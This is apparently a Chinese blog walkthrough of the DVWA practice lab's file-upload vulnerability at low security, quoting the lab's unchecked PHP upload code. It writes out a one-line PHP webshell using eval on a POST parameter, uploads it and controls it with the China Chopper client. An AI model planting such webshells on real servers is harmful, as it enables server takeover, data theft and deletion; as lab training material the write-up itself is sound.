DVWA靶机-File Upload(文件上传漏洞)一

DVWA靶机-File Upload(文件上传漏洞LOW级别)

1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制

首先查看一下后端代码



    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename( $_FILES['uploaded']['name']);

            if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                echo '
';
                echo 'Your image was not uploaded.';
                echo '
'
; } else { echo '
';
                echo $target_path . ' succesfully uploaded!';
                echo '
'
; } } ?>

  通过后端代码可以看到,它对上传文件的类型、内容没有做任何的检查、过滤。存在着很明显的文件上传漏洞。
  我们写一个一句话木马,shell.php(参数为pass)

 @eval($_POST['pass']);?>

  然后上传
DVWA靶机-File Upload(文件上传漏洞)一_第1张图片
  可以看到已经上传成功了,并且返回了文件路径

DVWA靶机-File Upload(文件上传漏洞)一_第2张图片
  因为知道了文件路径,这里我用Xshell连了靶机看了一下,确实上传成功了

  打开中国菜刀,右键添加
DVWA靶机-File Upload(文件上传漏洞)一_第3张图片
DVWA靶机-File Upload(文件上传漏洞)一_第4张图片
  尝试看看有没有权限
DVWA靶机-File Upload(文件上传漏洞)一_第5张图片
DVWA靶机-File Upload(文件上传漏洞)一_第6张图片

OK,完事

你可能感兴趣的:(DVWA,文件上传漏洞)